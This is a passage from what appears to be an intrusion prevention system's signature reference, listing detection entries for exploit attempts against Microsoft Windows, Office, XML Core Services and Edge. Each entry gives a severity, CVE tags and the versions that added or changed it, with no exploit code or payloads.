Last changed: sgpkg-ips-1782-5242
Vulnerability: Microsoft-Windows-File-Explorer-Command-File-NTLM-Relay-Vulnerability
Description:
Back to top

File-Text_Microsoft-Windows-Graphics-Rendering-Engine-VML-Negative-Focussize

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Graphics Rendering Enigine detected
Context: Text File Stream
Severity: 7
Tags: Windows XP 64-bit, Windows 2003 SP1, Windows Vista, Windows 2003 64-bit, Windows XP 64-bit SP2, Windows 2003 SP2, Windows Vista SP1, Windows 2008, Any Hardware, MS2008-09, CVE2007, Windows XP 64-bit not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-584-5211
Vulnerability: Microsoft-Windows-Graphics-Rendering-Engine-VML-BOF
Description:
Back to top

File-Text_Microsoft-Windows-Help-Facility-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to access vulnerabile ActiveX component
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2002, CVE2002, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Microsoft-Help-Facility-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-11, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
Description:
Back to top

File-Text_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-02, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412
Description:
Back to top

File-Text_Microsoft-Windows-ITS-Protocol-Information-Disclosure-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1029-5242
Vulnerability: Microsoft-Windows-ITS-Protocol-Information-Disclosure-Vulnerability
Description:
Back to top

File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-01, CVE2025, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189
Description:
Back to top

File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-01, CVE2025, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21189
Description:
Back to top

File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-01, CVE2025, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219
Description:
Back to top

File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-01, CVE2025, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21219
Description:
Back to top

File-Text_Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21268

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-01, CVE2025, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Microsoft-Windows-Mapurltozone-Security-Feature-Bypass-CVE-2025-21268
Description:
Back to top

File-Text_Microsoft-Windows-Media-Center-MCL-File-Code-Execution

About this situation: An attempt to exploit a vulnerability in Windows Media Center detected
Context: Text File Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 8, Any Hardware, MS2015-09, CVE2015, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-679-5211
Last changed: sgpkg-ips-679-5211
Vulnerability: Microsoft-Windows-Media-Center-MCL-File-Code-Execution
Description:
Back to top

File-Text_Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in Microsoft Windows Media Encoder 9 detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Windows Media Encoder, MS2008-09, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Microsoft-Windows-Media-Encoder-9-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Windows-Media-Player-1-CVE-2010-2745

About this situation: An attempt to exploit a vulnerability in Windows Media Player was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2010-10, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-WMP-CVE-2010-2745
Description:
Back to top

File-Text_Microsoft-Windows-Media-Player-2-CVE-2010-2745

About this situation: An attempt to exploit a vulnerability in Windows Media Player was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2010-10, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-WMP-CVE-2010-2745
Description:
Back to top

File-Text_Microsoft-Windows-Media-Player-File-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Media Player detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Windows Media Player, CVE2004, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Windows-Media-Player-File-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Windows-Media-Player-Media-Library-Manipulation

About this situation: An attempt to exploit a vulnerability in Windows Media Player detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, Windows not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Microsoft-Windows-Media-Player-Media-Library-Manipulation
Description:
Back to top

File-Text_Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1346-5242
Vulnerability: Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
Description:
Back to top

File-Text_Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096
Description:
Back to top

File-Text_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-12, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
Description:
Back to top

File-Text_Microsoft-Windows-OLE-CVE-2014-6332

About this situation: A vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-11, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1717-5242
Vulnerability: Microsoft-Windows-OLE-CVE-2014-6332
Description:
Back to top

File-Text_Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability

About this situation: Attempt to exploit a code execution vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2007-06, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-585-5211
Vulnerability: Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability
Description:
Back to top

File-Text_Microsoft-Windows-Script-Engine-Information-Disclosure-CVE-2011-0031

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Text File Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Any Hardware, MS2011-02, CVE2011, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Scripting-Engines-Information-Disclosure-CVE-2011-0031
Description:
Back to top

File-Text_Microsoft-Windows-Scripting-Engines-Script-Encoding

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-04, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Windows-Scripting-Engines-Script-Encoding
Description:
Back to top

File-Text_Microsoft-Windows-Search-Protocol-Handler-Command-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows Vista, Windows 2008, Any Hardware, MS2008-12, CVE2008, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Windows-Search-Protocol-Handler-Command-Execution
Description:
Back to top

File-Text_Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-12, CVE2022, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698
Description:
Back to top

File-Text_Microsoft-Windows-Themes-CVE-2024-38030-NTLM-Relay

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-07, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Microsoft-Windows-Themes-CVE-2024-38030-NTLM-Relay
Description:
Back to top

File-Text_Microsoft-Windows-Themes-CVE-2025-21308-NTLM-Relay

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2025, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Microsoft-Windows-Themes-CVE-2025-21308-NTLM-Relay
Description:
Back to top

File-Text_Microsoft-Windows-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Vulnerability: Microsoft-Windows-URI-Handler-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-Windows-VBScript-Engine-Dynamic-Array-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Windows-VBScript-Engine-Dynamic-Array-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Windows-VBScript-Help-File-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows VBScript detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2010-04, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-VBScript-Help-File-Code-Execution
Description:
Back to top

File-Text_Microsoft-Windows-VBScript-Help-File-Code-Execution-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows VBScript detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2010-04, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1407-5242
Vulnerability: Microsoft-Windows-VBScript-Help-File-Code-Execution
Description:
Back to top

File-Text_Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-05, MS2015-10, CVE2015, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1734-5242
Vulnerability: Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure
Microsoft-Windows-VBScript-Engine-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Windows-Vista-Windows-Mail-File-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Mail detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2007-06, CVE2007, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-Vista-Windows-Mail-File-Execution
Description:
Back to top

File-Text_Microsoft-Windows-Win32k.sys-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-02, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-438-4219
Vulnerability: Microsoft-Windows-Win32k.sys-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Windows-Windows-Script-Host-Command-Injection

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Microsoft-Windows-Windows-Script-Host-Command-Injection
Description:
Back to top

File-Text_Microsoft-Windows-Winhlp32-Item-Buffer-Overflow

About this situation: Buffer overflow in Winhlp32
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, CVE2002, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: HTTP-Winhlp32-Item-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Windows-XP-Large-Image-Resize-DoS

About this situation: An attempt to exploit a vulnerability in Windows XP detected
Context: Text File Stream
Severity: 2
Tags: Windows XP, Any Hardware, Windows XP not specific, Potential Denial of Service
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-438-4219
Vulnerability: Microsoft-Windows-XP-Large-Image-Resize-DoS
Description:
Back to top

File-Text_Microsoft-WMI-Administrative-Tools-ActiveX-Control

About this situation: An attempt to exploit a vulnerability in Microsoft WMI Administrative Tools detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft WMI Administrative Tools, MS2011-04, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-625-5211
Vulnerability: Microsoft-WMI-Administrative-Tools-ActiveX-Control
Description:
Back to top

File-Text_Microsoft-WMITools-ActiveX-Control-CVE-2010-3973

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, Internet Explorer, MS2011-04, CVE2010, Windows XP not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-WMITools-ActiveX-Control-CVE-2010-3973
Description:
Back to top

File-Text_Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Microsoft Word 2010, Microsoft Word 2013, Microsoft Word 2007, Microsoft Word 2003, MS2014-03, CVE2014, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-572-5211
Vulnerability: Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
Description:
Back to top

File-Text_Microsoft-Word-Security-Feature-Bypass-CVE-2024-49033

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2024-11, CVE2024, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: Microsoft-Word-Security-Feature-Bypass-CVE-2024-49033
Description:
Back to top

File-Text_Microsoft-Works-WkImgSrv.dll-ActiveX-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Works was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office 2003, Microsoft Works, Microsoft Office 2007, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Vulnerability: Microsoft-Works-WkImgSrv.dll-ActiveX-Vulnerability
Description:
Back to top

File-Text_Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft XML Core Services detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2006-11, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: HTTP-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Exectution
Description:
Back to top

File-Text_Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution-With-Open

About this situation: An attempt to exploit a vulnerability in Microsoft XML Core Services detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2006-11, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Vulnerability: HTTP-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Exectution
Description:
Back to top

File-Text_Microsoft-XML-Core-Services-CVE-2017-0024

About this situation: An attempt to exploit a vulnerability in Microsoft XML Core Services
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: Microsoft-XML-Core-Services-CVE-2017-0024
Description:
Back to top

File-Text_Microsoft-Xml-Core-Services-Msxml-Header-Information-Disclosure

About this situation: Attempt to exploit a vulnerability in Microsoft XML Core Services detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2008-11, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Xml-Core-Services-ParseError-DOM-Object-Disclosure

About this situation: Attempt to exploit a vulnerability in Microsoft XML Core Services detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2008-11, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1188-5242
Vulnerability: Microsoft-Xml-Core-Services-ParseError-DOM-Object-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Xml-Core-Services-Remote-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft XML Core Services detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft XML Core Services, MS2012-07, CVE2012, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-458-5211
Last changed: sgpkg-ips-1287-5242
Vulnerability: Microsoft-Xml-Core-Services-Remote-Code-Execution-Vulnerability
Description:
Back to top

File-Text_Microsoft-Xml-Core-Services-Vulnerable-ActiveX-Control

About this situation: Usage of a vulnerable ActiveX control detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2013-02, CVE2013, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-511-5211
Vulnerability: Microsoft-Xml-Core-Services-Integer-Truncation-Memory-Corruption
Microsoft-Internet-Explorer-XMLDOM-Information-Disclosure
Description:
Back to top

File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0810

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-04, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1149-5242
Vulnerability: Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0810
Description:
Back to top

File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0812

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-04, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1149-5242
Vulnerability: Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0812
Description:
Back to top

File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0860

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-04, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1232-5242
Vulnerability: Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0860
Description:
Back to top

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0592

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-03, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1143-5242
Vulnerability: Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0592
Description:
Back to top

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0770

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-03, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1143-5242
Vulnerability: Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0770
Description:
Back to top

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0771

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-03, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1143-5242
Vulnerability: Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0771
Description:
Back to top

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0990

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0990
Description:
Back to top

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1002

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1002
Description:
Back to top

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1023

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1023
Description:
Back to top

File-Text_Microsoft_Edge_Security_Bypass_Vulnerability_CVE-2019-0612

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-03, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1143-5242
Vulnerability: Microsoft_Edge_Security_Bypass_Vulnerability_CVE-2019-0612
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0639

